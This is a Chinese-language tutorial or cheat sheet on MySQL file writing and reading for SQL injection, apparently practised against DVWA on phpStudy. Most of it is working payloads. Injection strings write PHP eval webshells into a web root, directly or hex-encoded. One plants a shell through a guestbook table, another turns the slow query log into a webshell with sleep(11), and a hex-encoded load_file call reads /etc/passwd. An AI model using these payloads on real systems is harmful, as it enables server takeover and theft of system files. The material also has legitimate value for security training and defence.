触发条件
可以使用如下语句
show global variables like '%secure%'; #查询secure_file_priv的值, secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出 Mysql>=5.5.53 默认为NULL,即默认禁止导入导出 Mysql<5.5.53 默认为空,即默认无限制 secure_file_priv值为NULL = 禁止导入导出
使用函数
outfile 和 dumpfile
outfile
#实例 select '<?php phpinfo(); ?>' into outfile "C:\\\\phpStudy\\MySQL\\bin\\1.php"; select * from student into outfile 'C:/phpStudy/MySQL/bin/test.php';
dumpfile
#实例 select '<?php phpinfo(); ?>' into dumpfile "C:\\phpStudy\\MySQL\\bin\\1.php"; select * from student into outfile 'C:/phpStudy/MySQL/bin/test.php';
注意:
两者路径都不可用hex进制来表示 两个函数导出的格式有不同:outfile多行,dumpfile只能导出单行。写shell是注意格式
实践
1.一句话 outfile 直接写
#直接写 -1' union select 1,"<?php @eval($_POST['c']);?>" into outfile "C:/phpStudy/WWW/shell.php"# #shell HEX编码 id=-1' union select 1,0x3C3F70687020406576616C28245F504F53545B2763275D293B3F3E into outfile "C:/phpStudy/WWW/shell.php"#
2.一句话 插入数据库再outfile
#写入数据 id=-1';insert into dvwa.guestbook values (2,"<?php @eval($_POST['c']);?>","shell") ;# #读到shell.php id=-1' union select comment,name from dvwa.guestbook into outfile 'C:/phpStudy/WWW/shell.php';#
select …… into outfile
使用命令 select 'a\naa\raaaa' into outfile '/tmp/test.txt'
来看一下在常用的写文件场景下的结果
可以看到outfile对导出内容中的\n等特殊字符进行了转义,并且在文件内容的末尾增加了一个新行
接着使用命令 select 'a\naa\raaaa' into dumpfile '/tmp/test.txt'
来看一下
可以看到dumpfile对文件内容是原意写入,未做任何转移和增加。这也就是为什么 在平常的UDF提权中使用dumpfile进行dll文件
写入的原因
触发条件
mysql日志详解:https://blog.csdn.net/maguang_it/article/details/79922339
只有查询日志和慢查询日志可利用,演示用的是慢查询日志,
慢查询日志
慢查询日志是用来记录执行时间超过指定时间的查询语句。
#查询慢查询是否开启 SHOW GLOBAL VARIABLES LIKE '%query_log%'; #开启慢查询 set global slow_query_log = 1; #更改日志路径,这里的日志路径可以hex编码 set global slow_query_log_file='C:/phpStudy/WWW/logshell.php';
OFF 表示关闭,log_file
表示日志存放目录
完成时间大于10s的sql语句会被记录进慢查询日志,如:select * from users where sleep(11);
实践
1.开启慢查询日志并修改日志为网站路径下的脚本
-1';set global slow_query_log = 1;set global slow_query_log_file='C:/phpStudy/WWW/logshell.php';#
2.执行包含Shell的查询语句并使用sleep(11)让语句记录进慢查询日志脚本
-1';select "<?php eval($_POST[log]);?>" from users where sleep(11);#
触发条件
使用函数load_file()
select load_file('绝对路径');
与outfile/dumpfile不同的是,load_file的路径可被hex编码
select load_file(0x2F6574632F706173737764);
参考
https://www.cnblogs.com/zztac/p/11371149.html
https://www.freebuf.com/articles/web/244103.html